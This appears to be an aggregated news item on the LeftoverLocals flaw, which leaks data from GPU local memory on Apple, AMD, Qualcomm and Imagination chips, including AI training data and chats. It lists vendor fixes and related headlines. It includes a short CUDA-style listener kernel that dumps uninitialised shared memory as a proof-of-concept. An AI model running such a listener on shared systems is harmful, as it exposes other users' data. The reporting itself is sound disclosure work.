Apple, AMD, Qualcomm GPU security hole lets miscreants snoop on AI training and chats

Research made public on Tuesday detailed how miscreants can exploit the hole to read data they're not supposed to see from a system's local GPU memory.
While the flaw potentially affects all GPU applications running on vulnerable chips, it is especially concerning for machine-learning workloads: these models push large volumes of data through the GPU, so an exploit could swipe a correspondingly large amount of potentially sensitive information.
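To illustrate the class of bug being described (dubbed LeftoverLocals by Trail of Bits, per the article URL below), here is a minimal, hypothetical CUDA-style "listener" sketch. It assumes a vulnerable GPU that does not clear on-chip local/shared memory between kernel launches; the kernel and buffer names are invented for illustration, and this is not the researchers' actual proof-of-concept code.

```cuda
// Hypothetical sketch of a LeftoverLocals-style listener kernel.
// On a vulnerable GPU, shared (local) memory is not zeroed between
// kernel launches, so reading it before writing anything can reveal
// values left behind by a previously executed kernel -- potentially
// from another process, e.g. fragments of an LLM's intermediate data.
#include <cstdio>
#include <cuda_runtime.h>

__global__ void listener(unsigned int *out, size_t n) {
    // Dynamic shared memory, deliberately never initialized: on a
    // vulnerable part it still holds whatever the prior kernel wrote.
    extern __shared__ unsigned int leftovers[];
    for (size_t i = threadIdx.x; i < n; i += blockDim.x)
        out[i] = leftovers[i];   // dump the stale contents to global memory
}

int main() {
    const size_t n = 4096;  // 16 KiB of shared memory to dump
    unsigned int *out = nullptr;
    cudaMallocManaged(&out, n * sizeof(unsigned int));

    listener<<<1, 256, n * sizeof(unsigned int)>>>(out, n);
    cudaDeviceSynchronize();

    // On a patched GPU these words read as zero; non-zero words would be
    // data leaked across the kernel-launch boundary.
    for (size_t i = 0; i < 16; ++i) printf("%08x ", out[i]);
    printf("\n");

    cudaFree(out);
    return 0;
}
```

The mitigation vendors shipped amounts to clearing (or isolating) this on-chip memory between kernels, which is why the fix lands in GPU drivers and firmware rather than in application code.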
AMD also confirmed that many of its products are vulnerable to the memory leak, including multiple generations of Athlon and Ryzen desktop and mobile processors, Radeon graphics cards, and Radeon and Instinct datacenter GPUs.
Google pointed out to Trail of Bits that some Imagination GPUs are also impacted, and that the processor designer released a fix last month.
Google is aware of this vulnerability impacting AMD, Apple, and Qualcomm GPUs.
Google has released fixes for ChromeOS devices with impacted AMD and Qualcomm GPUs as part of the 120 and 114 releases in the Stable and LTS channels, respectively.
News URL
https://go.theregister.com/feed/www.theregister.com/2024/01/17/leftoverlocals_gpu_flaw/
Related news
- Taiwan Bans DeepSeek AI Over National Security Concerns, Citing Data Leakage Risks
- On Generative AI Security
- Yup, AMD's Elba and Giglio definitely sound like they work corporate security
- AI and Security - A New Puzzle to Figure Out
- Google Chrome's AI-powered security feature rolls out to everyone
- ⚡ THN Weekly Recap: From $1.5B Crypto Heist to AI Misuse & Apple’s Data Dilemma
- Qualcomm pledges 8 years of security updates for Android kit using its chips (YMMV)
- CrowdStrike Security Report: Generative AI Powers Social Engineering Attacks
- Nearly 12,000 API keys and passwords found in AI training dataset
- Innovation vs. security: Managing shadow AI risks